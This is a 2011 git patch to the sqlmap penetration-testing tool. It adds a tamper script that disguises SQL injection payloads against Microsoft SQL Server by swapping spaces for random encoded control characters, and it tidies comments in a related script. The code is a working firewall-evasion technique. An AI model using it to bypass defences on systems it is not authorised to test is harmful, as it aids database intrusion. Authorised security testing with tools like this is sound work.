From c9e6fc7695d9b091b27c21e44761e074f4f96eba Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 11 Jul 2011 09:49:58 +0000 Subject: [PATCH] Added new tamper script, tamper/space2mssqlblank.py from RS --- tamper/space2mssqlblank.py | 91 +++++++++++++++++++++++++++++++++++++ tamper/space2randomblank.py | 10 ++-- 2 files changed, 96 insertions(+), 5 deletions(-) create mode 100644 tamper/space2mssqlblank.py diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py new file mode 100644 index 000000000..dc886d5b8 --- /dev/null +++ b/tamper/space2mssqlblank.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python + +""" +$Id$ + +Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import random + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) + +def tamper(payload): + """ + Replaces space character (' ') with a random blank character from a + valid set of alternate characters + + Example: + * Input: SELECT id FROM users + * Output: SELECT%08id%02FROM%0Fusers + + Requirement: + * Microsoft SQL Server + + Tested against: + * Microsoft SQL Server 2000 + * Microsoft SQL Server 2005 + + Notes: + * Useful to bypass several web application firewalls + """ + + # ASCII table: + # SOH 01 start of heading + # STX 02 start of text + # ETX 03 end of text + # EOT 04 end of transmission + # ENQ 05 enquiry + # ACK 06 acknowledge + # BEL 07 bell + # BS 08 backspace + # TAB 09 horizontal tab + # LF 0A new line + # VT 0B vertical TAB + # FF 0C new page + # CR 0D carriage return + # SO 0E shift out + # SI 0F shift in + blanks = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A'] + retVal = payload + + if payload: + retVal = "" + quote, doublequote, firstspace, end = False, False, False, False + + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = True + retVal += random.choice(blanks) + continue + + elif payload[i] == '\'': + quote = not quote + + elif payload[i] == '"': + doublequote = not doublequote + + elif payload[i] == '#' or payload[i:i+3] == '-- ': + end = True + + elif payload[i] == " " and not doublequote and not quote: + if end: + retVal += random.choice(blanks[:-1]) + else: + retVal += random.choice(blanks) + + continue + + retVal += payload[i] + + return retVal diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py index b23a725b1..15e9b0c25 100644 --- a/tamper/space2randomblank.py +++ b/tamper/space2randomblank.py @@ -36,10 +36,10 @@ def tamper(payload): """ # ASCII table: - # \t 09 horizontal TAB - # \n 0A new line - # - 0C new page - # \r 0D carriage return + # TAB 09 horizontal TAB + # LF 0A new line + # FF 0C new page + # CR 0D carriage return blanks = ['%09', '%0A', '%0C', '%0D'] retVal = payload @@ -60,7 +60,7 @@ def tamper(payload): elif payload[i] == '"': doublequote = not doublequote - elif payload[i]==" " and not doublequote and not quote: + elif payload[i] == " " and not doublequote and not quote: retVal += random.choice(blanks) continue